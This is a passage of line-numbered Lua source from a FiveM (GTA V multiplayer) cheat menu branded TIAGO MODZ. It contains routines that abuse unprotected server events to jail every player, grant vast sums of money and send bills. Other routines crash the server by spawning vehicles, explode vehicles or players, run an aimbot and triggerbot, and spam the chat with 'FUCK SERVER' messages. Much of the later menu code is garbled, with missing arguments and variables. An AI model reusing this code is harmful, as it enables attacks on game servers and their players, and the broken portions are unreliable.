  5593. TriggerServerEvent("esx_jailer:sendToJail", GetPlayerServerId(i), 45 * 60)
  5594. TriggerServerEvent("esx_jail:sendToJail", GetPlayerServerId(i), 45 * 60)
  5595. TriggerServerEvent("js:jailuser", GetPlayerServerId(i), 45 * 60, " Welcom *TIAGO MODZ 3.2* buy Mod Menu in")
  5596. TriggerServerEvent("esx-qalle-jail:jailPlayer", GetPlayerServerId(i), 45 * 60, " Welcom *TIAGO MODZ 3.1* buy Mod Menu in")
  5597. TriggerServerEvent("esx-qalle-jail:updateJailTime_n96nDDU@X?@zpf8", GetPlayerServerId(i), 45 * 60, " Welcom *TIAGO MODZ 3.2* buy Mod Menu in")
  5598. end
  5599. end
  5601. if esxdestroy then
  5602. for i = 0, 128 do
  5603. TriggerServerEvent('esx_truckerjob:pay', 9999999999)
  5604. TriggerServerEvent('AdminMenu:giveCash', 9999999999)
  5605. TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
  5606. TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
  5607. TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
  5608. TriggerServerEvent('esx:giveInventoryItem', GetPlayerServerId(i), "item_money", "money", 10000000)
  5609. TriggerServerEvent('esx_billing:sendBill', GetPlayerServerId(i), "Purposeless", "Best Tiago Menu 3.2", 10000000)
  5611. end
  5612. end
  5614. if servercrasher then
  5615. local camion = "phantom"
  5616. local avion = "CARGOPLANE"
  5617. local avion2 = "luxor"
  5618. local heli = "maverick"
  5619. local random = "bus"
  5620. CreateVehicle(GetHashKey(avion), 0, 0, -10, true, true)
  5621. CreateVehicle(GetHashKey(avion), 0, 0, -50, true, true)
  5622. CreateVehicle(GetHashKey(avion), 0, 0, -100, true, true)
  5623. CreateVehicle(GetHashKey(avion2), 0, 3, -1000, true, true)
  5624. CreateVehicle(GetHashKey(avion2), 1621, 0, -50, true, true)
  5625. CreateVehicle(GetHashKey(avion2), 1242, 1, -100, true, true)
  5626. CreateVehicle(GetHashKey(camion), 612, 4, -10, true, true)
  5627. CreateVehicle(GetHashKey(camion), 1234, 0, -50, true, true)
  5628. CreateVehicle(GetHashKey(camion), 0, 0, -100, true, true)
  5629. CreateVehicle(GetHashKey(random), 512, 1233, -10, true, true)
  5630. CreateVehicle(GetHashKey(random), 155, 2, -50, true, true)
  5631. CreateVehicle(GetHashKey(random), 333, 0, -100, true, true)
  5632. CreateVehicle(GetHashKey(heli), -121, 100, -10, true, true)
  5633. CreateVehicle(GetHashKey(heli), -121, 2555, -50, true, true)
  5634. CreateVehicle(GetHashKey(heli), -121, 123, -100, true, true)
  5635. end
  5637. if not Collision then
  5638. playerveh = GetVehiclePedIsIn(PlayerPedId(), false)
  5639. for k in EnumerateVehicles() do
  5640. SetEntityNoCollisionEntity(k, playerveh, true)
  5641. end
  5642. for k in EnumerateObjects() do
  5643. SetEntityNoCollisionEntity(k, playerveh, true)
  5644. end
  5645. for k in EnumeratePeds() do
  5646. SetEntityNoCollisionEntity(k, playerveh, true)
  5647. end
  5648. for k in EnumeratePickups() do
  5649. SetEntityNoCollisionEntity(k, playerveh, true)
  5651. end
  5652. end
  5655. local ci = true
  5656. if ci then
  5657. local cK = false
  5658. local cL = 130
  5659. local cM = 0
  5660. for i = 0, 128 do
  5661. if NetworkIsPlayerActive(i) and GetPlayerPed(i) ~= GetPlayerPed(-1) then
  5662. ped = GetPlayerPed(i)
  5663. blip = GetBlipFromEntity(ped)
  5664. x1, y1, z1 = table.unpack(GetEntityCoords(GetPlayerPed(-1), true))
  5665. x2, y2, z2 = table.unpack(GetEntityCoords(GetPlayerPed(i), true))
  5666. distance = math.floor(GetDistanceBetweenCoords(x1, y1, z1, x2, y2, z2, true))
  5667. if cK then
  5668. if NetworkIsPlayerTalking(i) then
  5669. local cN = d(1.0)
  5670. DrawText3D(
  5671. x2,
  5672. y2,
  5673. z2 + 1.2,
  5674. GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
  5675. cN.r,
  5676. cN.g,
  5677. cN.b
  5678. )
  5679. else
  5680. DrawText3D(
  5681. x2,
  5682. y2,
  5683. z2 + 1.2,
  5684. GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
  5685. 255,
  5686. 255,
  5687. 255
  5688. )
  5689. end
  5690. end
  5691. if distance < cL then
  5692. if not cK then
  5693. if NetworkIsPlayerTalking(i) then
  5694. local cN = d(1.0)
  5695. DrawText3D(
  5696. x2,
  5697. y2,
  5698. z2 + 1.2,
  5699. GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
  5700. cN.r,
  5701. cN.g,
  5702. cN.b
  5703. )
  5704. else
  5705. DrawText3D(
  5706. x2,
  5707. y2,
  5708. z2 + 1.2,
  5709. GetPlayerServerId(i) .. ' | ' .. GetPlayerName(i),
  5710. 255,
  5711. 255,
  5712. 255
  5713. )
  5714. end
  5715. end
  5716. end
  5717. end
  5718. end
  5719. end
  5722. if nuke then
  5723. local camion = "phantom"
  5724. local avion = "CARGOPLANE"
  5725. local avion2 = "luxor"
  5726. local heli = "maverick"
  5727. local random = "bus"
  5728. for i = 0, 128 do
  5729. while not HasModelLoaded(GetHashKey(avion)) do
  5730. Citizen.Wait(0)
  5731. RequestModel(GetHashKey(avion))
  5732. end
  5733. Citizen.Wait(200)
  5735. local avion2 = CreateVehicle(GetHashKey(camion), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  5736. CreateVehicle(GetHashKey(camion), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  5737. CreateVehicle(GetHashKey(camion), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  5738. CreateVehicle(GetHashKey(avion), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  5739. CreateVehicle(GetHashKey(avion), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  5740. CreateVehicle(GetHashKey(avion), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  5741. CreateVehicle(GetHashKey(avion2), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  5742. CreateVehicle(GetHashKey(avion2), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  5743. CreateVehicle(GetHashKey(avion2), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  5744. CreateVehicle(GetHashKey(heli), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  5745. CreateVehicle(GetHashKey(heli), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  5746. CreateVehicle(GetHashKey(heli), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true) and
  5747. CreateVehicle(GetHashKey(random), GetEntityCoords(GetPlayerPed(i)) + 2.0, true, true) and
  5748. CreateVehicle(GetHashKey(random), GetEntityCoords(GetPlayerPed(i)) + 10.0, true, true) and
  5749. CreateVehicle(GetHashKey(random), 2 * GetEntityCoords(GetPlayerPed(i)) + 15.0, true, true)
  5750. end
  5751. end
  5753. if VehSpeed and IsPedInAnyVehicle(PlayerPedId(), true) then
  5754. if IsControlPressed(0, 118) then
  5755. SetVehicleForwardSpeed(GetVehiclePedIsUsing(PlayerPedId()), 70.0)
  5756. elseif IsControlPressed(0, 109) then
  5757. SetVehicleForwardSpeed(GetVehiclePedIsUsing(PlayerPedId()), 0.0)
  5758. end
  5759. end
  5761. if bifegfubffff then
  5762. local impact, coords = GetPedLastWeaponImpactCoord(PlayerPedId())
  5763. if impact then
  5764. AddExplosion(coords.x, coords.y, coords.z, 2, 100000.0, true, false, 0)
  5765. end
  5766. end
  5769. if TriggerBot then
  5770. local Aiming, Entity = GetEntityPlayerIsFreeAimingAt(PlayerId(), Entity)
  5771. if Aiming then
  5772. if IsEntityAPed(Entity) and not IsPedDeadOrDying(Entity, 0) and IsPedAPlayer(Entity) then
  5773. ShootPlayer(Entity)
  5774. end
  5775. end
  5776. end
  5779. if Oneshot then
  5780. SetPlayerWeaponDamageModifier(PlayerId(), 100.0)
  5781. local gotEntity = getEntity(PlayerId())
  5782. if IsEntityAPed(gotEntity) then
  5783. if IsPedInAnyVehicle(gotEntity, true) then
  5784. if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
  5785. if IsControlJustReleased(1, 69) then
  5786. NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
  5787. end
  5788. else
  5789. if IsControlJustReleased(1, 142) then
  5790. NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
  5791. end
  5792. end
  5793. end
  5794. elseif IsEntityAVehicle(gotEntity) then
  5795. if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
  5796. if IsControlJustReleased(1, 69) then
  5797. NetworkExplodeVehicle(gotEntity, true, true, 0)
  5798. end
  5799. else
  5800. if IsControlJustReleased(1, 142) then
  5801. NetworkExplodeVehicle(gotEntity, true, true, 0)
  5802. end
  5803. end
  5804. end
  5805. else
  5806. SetPlayerWeaponDamageModifier(PlayerId(), 1.0)
  5807. end
  5814. if AimBot then
  5815. SetPlayerWeaponDamageModifier(PlayerId(), 100.0)
  5816. local gotEntity = getEntity(PlayerId())
  5817. if IsEntityAPed(gotEntity) then
  5818. if IsPedInAnyVehicle(gotEntity, true) then
  5819. if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
  5820. if IsControlJustReleased(1, 69) then
  5821. NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
  5822. end
  5823. else
  5824. if IsControlJustReleased(1, 142) then
  5825. NetworkExplodeVehicle(GetVehiclePedIsIn(gotEntity, true), true, true, 0)
  5826. end
  5827. end
  5828. end
  5829. elseif IsEntityAVehicle(gotEntity) then
  5830. if IsPedInAnyVehicle(GetPlayerPed(-1), true) then
  5831. if IsControlJustReleased(1, 69) then
  5832. NetworkExplodeVehicle(gotEntity, true, true, 0)
  5833. end
  5834. else
  5835. if IsControlJustReleased(1, 142) then
  5836. NetworkExplodeVehicle(gotEntity, true, true, 0)
  5837. end
  5838. end
  5839. end
  5840. else
  5841. SetPlayerWeaponDamageModifier(PlayerId(), 1.0)
  5842. end
  5844. if blowall then
  5845. for i = 0, 64 do
  5846. AddExplosion(GetEntityCoords(GetPlayerPed(i)), 2, 100000.0, true, false, 100000.0)
  5847. end
  5848. end
  5850. if spam then
  5851. for i = 0, 128 do
  5852. TriggerServerEvent(
  5853. '_chat:messageEntered',
  5854. 'FUCK SERVER by TIAGO MODZ#5836',
  5855. {0, 0x99, 255},
  5856. 'FUCK SERVER by TIAGO MODZ#5836'
  5857. )
  5858. TriggerServerEvent('_chat:messageEntered', 'FUCK SERVER by TIAGO MODZ#5836', {0, 0x99, 255}, 'FUCK SERVER by TIAGO MODZ#5836')
  5859. end
  5860. end
  5862. DisplayRadar(true)
  5864. if RainbowVeh then
  5865. local ra = RGBRainbow(1.0)
  5866. SetVehicleCustomPrimaryColour(GetVehiclePedIsUsing(PlayerPedId()), ra.r, ra.g, ra.b)
  5867. SetVehicleCustomSecondaryColour(GetVehiclePedIsUsing(PlayerPedId()), ra.r, ra.g, ra.b)
  5868. end
  5870. if Noclip then
  5871. local currentSpeed = 2
  5872. local noclipEntity =
  5873. IsPedInAnyVehicle(PlayerPedId(), false) and GetVehiclePedIsUsing(PlayerPedId()) or PlayerPedId()
  5874. FreezeEntityPosition(PlayerPedId(), true)
  5875. SetEntityInvincible(PlayerPedId(), true)
  5877. local newPos = GetEntityCoords(entity)
  5879. DisableControlAction(0, 32, true) --MoveUpOnly
  5880. DisableControlAction(0, 268, true) --MoveUp
  5882. DisableControlAction(0, 31, true) --MoveUpDown
  5884. DisableControlAction(0, 269, true) --MoveDown
  5885. DisableControlAction(0, 33, true) --MoveDownOnly
  5887. DisableControlAction(0, 266, true) --MoveLeft
  5888. DisableControlAction(0, 34, true) --MoveLeftOnly
  5890. DisableControlAction(0, 30, true) --MoveLeftRight
  5892. DisableControlAction(0, 267, true) --MoveRight
  5893. DisableControlAction(0, 35, true) --MoveRightOnly
  5895. DisableControlAction(0, 44, true) --Cover
  5896. DisableControlAction(0, 20, true) --MultiplayerInfo
  5898. local yoff = 0.0
  5899. local zoff = 0.0
  5901. if GetInputMode() == "MouseAndKeyboard" then
  5902. if IsDisabledControlPressed(0, 32) then
  5903. yoff = 0.5
  5904. end
  5905. if IsDisabledControlPressed(0, 33) then
  5906. yoff = -0.5
  5907. end
  5908. if IsDisabledControlPressed(0, 34) then
  5909. SetEntityHeading(PlayerPedId(), GetEntityHeading(PlayerPedId()) + 3.0)
  5910. end
  5911. if IsDisabledControlPressed(0, 35) then
  5912. SetEntityHeading(PlayerPedId(), GetEntityHeading(PlayerPedId()) - 3.0)
  5913. end
  5914. if IsDisabledControlPressed(0, 44) then
  5915. zoff = 0.21
  5916. end
  5917. if IsDisabledControlPressed(0, 20) then
  5918. zoff = -0.21
  5919. end
  5920. end
  5922. newPos =
  5923. GetOffsetFromEntityInWorldCoords(noclipEntity, 0.0, yoff * (currentSpeed + 0.3), zoff * (currentSpeed + 0.3))
  5925. local heading = GetEntityHeading(noclipEntity)
  5926. SetEntityVelocity(noclipEntity, 0.0, 0.0, 0.0)
  5927. SetEntityRotation(noclipEntity, 0.0, 0.0, 0.0, 0, false)
  5928. SetEntityHeading(noclipEntity, heading)
  5930. SetEntityCollision(noclipEntity, false, false)
  5931. SetEntityCoordsNoOffset(noclipEntity, newPos.x, newPos.y, newPos.z, true, true, true)
  5933. FreezeEntityPosition(noclipEntity, false)
  5934. SetEntityInvincible(noclipEntity, false)
  5935. SetEntityCollision(noclipEntity, true, true)
  5936. end
  5937. end
  5938. end
  5939. )
  5941. function GetPlayers()
  5942. local players = {}
  5944. for i = 0, 31 do
  5945. if NetworkIsPlayerActive(i) then
  5946. table.insert(players, i)
  5947. end
  5948. end
  5950. return players
  5951. end
  5954. function FirePlayer(SelectedPlayer)
  5955. if ESX then
  5956. ESX.TriggerServerCallback('esx_society:getOnlinePlayers', function(players)
  5958. local playerMatch = nil
  5959. for i=1, #players, 1 do
  5960. label = players[i].name
  5961. value = players[i].source
  5962. name = players[i].name
  5963. if name == GetPlayerName(SelectedPlayer) then
  5964. playerMatch = players[i].identifier
  5965. debugLog('found ' .. players[i].name .. ' ' .. players[i].identifier)
  5966. end
  5967. identifier = players[i].identifier
  5968. end
  5972. ESX.TriggerServerCallback('esx_society:setJob', function()
  5973. end, playerMatch, 'unemployed', 0, 'hire')
  5975. end)
  5976. end
  5977. end
  5979. Citizen.CreateThread(
  5980. function()
  5981. FreezeEntityPosition(entity, false)
  5982. local currentItemIndex = 1
  5983. local selectedItemIndex = 1
  5986. TiagoMenu.CreateMenu("MainMenu", "∑ TIAGO ~n~~r~MENU ∑")
  5987. TiagoMenu.SetSubTitle("MainMenu", "VERSION 3.6")
  5988. TiagoMenu.CreateSubMenu("Models", "MainMenu", "Model")
  5989. TiagoMenu.CreateSubMenu("SelfMenu", "MainMenu", "PlayerMenu")
  5990. TiagoMenu.CreateSubMenu("World", "MainMenu", "World")
  5991. TiagoMenu.CreateSubMenu("Fuck", "MainMenu", "Fuck")
  5992. TiagoMenu.CreateSubMenu("VehMenu", "MainMenu", "Vehicle Menu")
  5993. TiagoMenu.CreateSubMenu("ServerMenu", "MainMenu", "LUA Execution")
  5994. TiagoMenu.CreateSubMenu("TeleportMenu", "MainMenu", "Teleport Menu")
  5995. TiagoMenu.CreateSubMenu('OnlinePlayerMenu', 'MainMenu', 'Online Player Menu')
  5996. TiagoMenu.CreateSubMenu('PlayerOptionsMenu', 'OnlinePlayerMenu', 'Player Options')
  5997. TiagoMenu.CreateSubMenu('SingleWepPlayer', 'OnlinePlayerMenu', 'Single Weapon Menu')
  5998. TiagoMenu.CreateSubMenu("WepMenu", "MainMenu", "Weapon Menu")
  5999. TiagoMenu.CreateSubMenu("SingleWepMenu", "WepMenu", "Single Weapon Menu")
  6000. TiagoMenu.CreateSubMenu("ESXBoss", "ServerMenu", "ESX Boss Menus")
  6001. TiagoMenu.CreateSubMenu("ESXMoney", "ServerMenu", "Money Options")
  6002. TiagoMenu.CreateSubMenu("ESXMisc", "ServerMenu", "ESX Misc Options")
  6003. TiagoMenu.CreateSubMenu("ESXDrugs", "ServerMenu", "ESX Drugs")
  6004. TiagoMenu.CreateSubMenu("MiscServerOptions", "ServerMenu", "Misc Server Options")
  6005. TiagoMenu.CreateSubMenu("RecrutarPlayers", "ServerMenu", "Recrutar Players")
  6006. TiagoMenu.CreateSubMenu("RecrutarPlayersOptions", "RecrutarPlayers", "Recrutar Players options")
  6007. TiagoMenu.CreateSubMenu("RecrutarPlayersOptions", "RecrutarPlayers", "Recrutar Players options")
  6009. TiagoMenu.CreateSubMenu(
  6010. 'WeaponTypes',
  6011. 'WepMenu',
  6012. 'Weapons'
  6013. )
  6014. TiagoMenu.CreateSubMenu(
  6015. 'WeaponTypeSelection',
  6016. 'WeaponTypes',
  6017. 'Weapon'
  6018. )
  6019. TiagoMenu.CreateSubMenu(
  6020. 'WeaponOptions',
  6021. 'WeaponTypeSelection',
  6022. 'Weapon Options'
  6023. )
  6024. TiagoMenu.CreateSubMenu('ModSelect', 'WeaponOptions', 'Weapon Mod Options')
  6025. TiagoMenu.CreateSubMenu('CarTypes', 'VehMenu', 'Vehicles')
  6026. TiagoMenu.CreateSubMenu('VehBoostMenu', 'VehMenu', 'Vehicle Boost')
  6028. TiagoMenu.CreateSubMenu('CarTypeSelection', 'CarTypes', 'Types')
  6029. TiagoMenu.CreateSubMenu(
  6030. 'CarOptions',
  6031. 'CarTypeSelection',
  6032. 'Car Options'
  6033. )
  6034. TiagoMenu.CreateSubMenu('LSC', 'VehMenu', 'LSC Customs')
  6035. TiagoMenu.CreateSubMenu('tunings', 'LSC', 'Visual Tuning')
  6036. TiagoMenu.CreateSubMenu('performance', 'LSC', 'Performance Tuning')
  6039. for i, da in pairs(be) do
  6040. TiagoMenu.CreateSubMenu(, 'tunings',
  6041. if == 'paint' then
  6042. TiagoMenu.CreateSubMenu('primary',, 'Primary Paint')
  6043. TiagoMenu.CreateSubMenu('secondary',, 'Secondary Paint')
  6044. TiagoMenu.CreateSubMenu('rimpaint',, 'Wheel Paint')
  6045. TiagoMenu.CreateSubMenu('classic1', 'primary', 'Classic Paint')
  6046. TiagoMenu.CreateSubMenu('metallic1', 'primary', 'Metallic Paint')
  6047. TiagoMenu.CreateSubMenu('matte1', 'primary', 'Matte Paint')
  6048. TiagoMenu.CreateSubMenu('metal1', 'primary', 'Metal Paint')
  6049. TiagoMenu.CreateSubMenu('classic2', 'secondary', 'Classic Paint')
  6050. TiagoMenu.CreateSubMenu('metallic2', 'secondary', 'Metallic Paint')
  6051. TiagoMenu.CreateSubMenu('matte2', 'secondary', 'Matte Paint')
  6052. TiagoMenu.CreateSubMenu('metal2', 'secondary', 'Metal Paint')
  6053. TiagoMenu.CreateSubMenu('classic3', 'rimpaint', 'Classic Paint')
  6054. TiagoMenu.CreateSubMenu('metallic3', 'rimpaint', 'Metallic Paint')
  6055. TiagoMenu.CreateSubMenu('matte3', 'rimpaint', 'Matte Paint')
  6056. TiagoMenu.CreateSubMenu('metal3', 'rimpaint', 'Metal Paint')
  6057. end
  6058. end
  6059. for i, da in pairs(bf) do
  6060. TiagoMenu.CreateSubMenu(, 'performance',
  6061. end
  6062. local SelectedPlayer
  6063. while bm do
  6064. ped = PlayerPedId()
  6065. veh = GetVehiclePedIsUsing(ped)
  6066. SetVehicleModKit(veh, 0)
  6067. for i, da in pairs(be) do
  6068. if TiagoMenu.IsMenuOpened('tunings') then
  6069. if b9 then
  6070. if bb == 'neon' then
  6071. local r, g, b = table.unpack(ba)
  6072. SetVehicleNeonLightsColour(veh, r, g, b)
  6073. SetVehicleNeonLightEnabled(veh, 0, bd)
  6074. SetVehicleNeonLightEnabled(veh, 1, bd)
  6075. SetVehicleNeonLightEnabled(veh, 2, bd)
  6076. SetVehicleNeonLightEnabled(veh, 3, bd)
  6077. b9 = false
  6078. bb = -1
  6079. ba = -1
  6080. elseif bb == 'paint' then
  6081. local db, dc, dd, de = table.unpack(ba)
  6082. SetVehicleColours(veh, db, dc)
  6083. SetVehicleExtraColours(veh, dd, de)
  6084. b9 = false
  6085. bb = -1
  6086. ba = -1
  6087. else
  6088. if bd == 'rm' then
  6089. RemoveVehicleMod(veh, bb)
  6090. b9 = false
  6091. bb = -1
  6092. ba = -1
  6093. else
  6094. SetVehicleMod(veh, bb, ba, false)
  6095. b9 = false
  6096. bb = -1
  6097. ba = -1
  6098. end
  6099. end
  6100. end
  6101. end
  6102. if TiagoMenu.IsMenuOpened( then
  6103. if == 'wheeltypes' then
  6104. if TiagoMenu.Button('Sport Wheels') then
  6105. SetVehicleWheelType(veh, 0)
  6106. elseif TiagoMenu.Button('Muscle Wheels') then
  6107. SetVehicleWheelType(veh, 1)
  6108. elseif TiagoMenu.Button('Lowrider Wheels') then
  6109. SetVehicleWheelType(veh, 2)
  6110. elseif TiagoMenu.Button('SUV Wheels') then
  6111. SetVehicleWheelType(veh, 3)
  6112. elseif TiagoMenu.Button('Offroad Wheels') then
  6113. SetVehicleWheelType(veh, 4)
  6114. elseif TiagoMenu.Button('Tuner Wheels') then
  6115. SetVehicleWheelType(veh, 5)
  6116. elseif TiagoMenu.Button('High End Wheels') then
  6117. SetVehicleWheelType(veh, 7)
  6118. end
  6119. TiagoMenu.Display()
  6120. elseif == 'extra' then
  6121. local df = checkValidVehicleExtras()
  6122. for i, da in pairs(df) do
  6123. if IsVehicleExtraTurnedOn(veh, i) then
  6124. pricestring = 'Installed'
  6125. else
  6126. pricestring = 'Not Installed'
  6127. end
  6128. if TiagoMenu.Button(da.menuName, pricestring) then
  6129. SetVehicleExtra(veh, i, IsVehicleExtraTurnedOn(veh, i))
  6130. end
  6131. end
  6132. TiagoMenu.Display()
  6133. elseif == 'neon' then
  6134. if TiagoMenu.Button('None') then
  6135. SetVehicleNeonLightsColour(veh, 255, 255, 255)
  6136. SetVehicleNeonLightEnabled(veh, 0, false)
  6137. SetVehicleNeonLightEnabled(veh, 1, false)
  6138. SetVehicleNeonLightEnabled(veh, 2, false)
  6139. SetVehicleNeonLightEnabled(veh, 3, false)
  6140. end
  6141. for i, da in pairs(bg) do
  6142. colorr, colorg, colorb = table.unpack(da)
  6143. r, g, b = GetVehicleNeonLightsColour(veh)
  6144. if
  6145. colorr == r and colorg == g and colorb == b and IsVehicleNeonLightEnabled(vehicle, 2) and
  6146. not b9
  6147. then
  6148. pricestring = 'Installed'
  6149. else
  6150. if b9 and colorr == r and colorg == g and colorb == b then
  6151. pricestring = 'Previewing'
  6152. else
  6153. pricestring = 'Not Installed'
  6154. end
  6155. end
  6156. if TiagoMenu.Button(i, pricestring) then
  6157. if not b9 then
  6158. bb = 'neon'
  6159. bd = IsVehicleNeonLightEnabled(veh, 1)
  6160. oldr, oldg, oldb = GetVehicleNeonLightsColour(veh)
  6161. ba = table.pack(oldr, oldg, oldb)
  6162. SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
  6163. SetVehicleNeonLightEnabled(veh, 0, true)
  6164. SetVehicleNeonLightEnabled(veh, 1, true)
  6165. SetVehicleNeonLightEnabled(veh, 2, true)
  6166. SetVehicleNeonLightEnabled(veh, 3, true)
  6167. b9 = true
  6168. elseif b9 and colorr == r and colorg == g and colorb == b then
  6169. SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
  6170. SetVehicleNeonLightEnabled(veh, 0, true)
  6171. SetVehicleNeonLightEnabled(veh, 1, true)
  6172. SetVehicleNeonLightEnabled(veh, 2, true)
  6173. SetVehicleNeonLightEnabled(veh, 3, true)
  6174. b9 = false
  6175. bb = -1
  6176. ba = -1
  6177. elseif b9 and colorr ~= r or colorg ~= g or colorb ~= b then
  6178. SetVehicleNeonLightsColour(veh, colorr, colorg, colorb)
  6179. SetVehicleNeonLightEnabled(veh, 0, true)
  6180. SetVehicleNeonLightEnabled(veh, 1, true)
  6181. SetVehicleNeonLightEnabled(veh, 2, true)
  6182. SetVehicleNeonLightEnabled(veh, 3, true)
  6183. b9 = true
  6184. end
  6185. end
  6186. end
  6187. TiagoMenu.Display()
  6188. elseif == 'paint' then
  6189. if TiagoMenu.MenuButton('~h~~p~-> ~s~Primary Paint', 'primary') then
  6190. elseif TiagoMenu.MenuButton('~h~~p~-> ~s~Secondary Paint', 'secondary') then
  6191. elseif TiagoMenu.MenuButton('~h~~p~-> ~s~Wheel Paint', 'rimpaint') then
  6192. end
  6193. TiagoMenu.Display()
  6194. else
  6195. local at = checkValidVehicleMods(
  6196. for dg, dh in pairs(at) do
  6197. if dh.menuName == '~h~~b~Stock' then
  6198. price = 0
  6199. end
  6200. if == 'Horns' then
  6201. for di, dj in pairs(horns) do
  6202. if dj == dg - 1 then
  6203. dh.menuName = di
  6204. end
  6205. end
  6206. end
  6207. if dh.menuName == 'NULL' then
  6208. dh.menuname = 'unknown'
  6209. end
  6210. if TiagoMenu.Button(dh.menuName, price) then
  6211. if not b9 then
  6212. bb =
  6213. ba = GetVehicleMod(veh,
  6214. b9 = true
  6215. if == -1 then
  6216. bd = 'rm'
  6217. RemoveVehicleMod(veh,
  6218. b9 = false
  6219. bb = -1
  6220. ba = -1
  6221. bd = false
  6222. else
  6223. bd = false
  6224. SetVehicleMod(veh,,, false)
  6225. end
  6226. elseif b9 and GetVehicleMod(veh, == then
  6227. b9 = false
  6228. bb = -1
  6229. ba = -1
  6230. bd = false
  6231. if == -1 then
  6232. RemoveVehicleMod(veh,
  6233. else
  6234. SetVehicleMod(veh,,, false)
  6235. end
  6236. elseif b9 and GetVehicleMod(veh, ~= then
  6237. if == -1 then
  6238. RemoveVehicleMod(veh,
  6239. b9 = false
  6240. bb = -1
  6241. ba = -1
  6242. bd = false
  6243. else
  6244. SetVehicleMod(veh,,, false)
  6245. b9 = true
  6246. end
  6247. end
  6248. end
  6249. end
  6250. TiagoMenu.Display()
  6251. end
  6252. end
  6253. end
  6254. for i, da in pairs(bf) do
  6255. if TiagoMenu.IsMenuOpened( then
  6256. if GetVehicleMod(veh, == 0 then
  6257. pricestock = 'Not Installed'
  6258. price1 = 'Installed'
  6259. price2 = 'Not Installed'
  6260. price3 = 'Not Installed'
  6261. price4 = 'Not Installed'
  6262. elseif GetVehicleMod(veh, == 1 then
  6263. pricestock = 'Not Installed'
  6264. price1 = 'Not Installed'
  6265. price2 = 'Installed'
  6266. price3 = 'Not Installed'
  6267. price4 = 'Not Installed'
  6268. elseif GetVehicleMod(veh, == 2 then
  6269. pricestock = 'Not Installed'
  6270. price1 = 'Not Installed'
  6271. price2 = 'Not Installed'
  6272. price3 = 'Installed'
  6273. price4 = 'Not Installed'
  6274. elseif GetVehicleMod(veh, == 3 then
  6275. pricestock = 'Not Installed'
  6276. price1 = 'Not Installed'
  6277. price2 = 'Not Installed'
  6278. price3 = 'Not Installed'
  6279. price4 = 'Installed'
  6280. elseif GetVehicleMod(veh, == -1 then
  6281. pricestock = 'Installed'
  6282. price1 = 'Not Installed'
  6283. price2 = 'Not Installed'
  6284. price3 = 'Not Installed'
  6285. price4 = 'Not Installed'
  6286. end
  6287. if TiagoMenu.Button('Stock ' .., pricestock) then
  6288. SetVehicleMod(veh,, -1)
  6289. elseif TiagoMenu.Button( .. ' Upgrade 1', price1) then
  6290. SetVehicleMod(veh,, 0)
  6291. elseif TiagoMenu.Button( .. ' Upgrade 2', price2) then
  6292. SetVehicleMod(veh,, 1)
  6293. elseif TiagoMenu.Button( .. ' Upgrade 3', price3) then
  6294. SetVehicleMod(veh,, 2)
  6295. elseif ~= 13 and ~= 12 and TiagoMenu.Button( .. ' Upgrade 4', price4) then
  6296. SetVehicleMod(veh,, 3)
  6297. end
  6298. TiagoMenu.Display()
  6299. end
  6300. end
  6303. if TiagoMenu.IsMenuOpened("MainMenu") then
  6305. drawNotification("~h~WELCOM ~r~[~s~ " ..GetPlayerName(PlayerId()).." ~r~]")
  6306. drawNotification("~h~Key ~h~~g~[ 1 ] ~s~Teleport Waypoint")
  6307. drawNotification("~h~Key ~h~~g~[ 2 ] ~s~Fix Car")
  6308. drawNotification("~h~~g~Official Discord: ~s~~n~~h~ ~n~~r~TiagoModz#5836")
  6310. if TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Online ~s~Players ~h~~r~←", "OnlinePlayerMenu") then
  6311. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Player ~s~Menu ~h~~r~←", "SelfMenu") then
  6312. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Models ~s~Menu ~h~~r~←", "Models") then
  6313. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~World ~s~Menu ~h~~r~←", "World") then
  6314. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Teleporte ~s~Menu ~h~~r~←", "TeleportMenu") then
  6315. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Vehicles ~s~Menu ~h~~r~←", "VehMenu") then
  6316. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Weapons ~s~Menu ~h~~r~←", "WepMenu") then
  6317. elseif TiagoMenu.MenuButton("~h~~r~→ ~s~~h~Fuck ~s~Server ~h~~r~←", "Fuck") then
  6318. elseif TiagoMenu.MenuButton("~h~~r~→ ~g~∑ <FONT COLOR='#15f600'>LUA MENU ~g~∑ ~h~~r~←", "ServerMenu") then
  6319. elseif TiagoMenu.Button("X ~r~DISCONNECT ~s~X") then
  6320. bm = false
  6321. end
  6323. TiagoMenu.Display()
  6324. elseif TiagoMenu.IsMenuOpened("SelfMenu") then
  6325. if
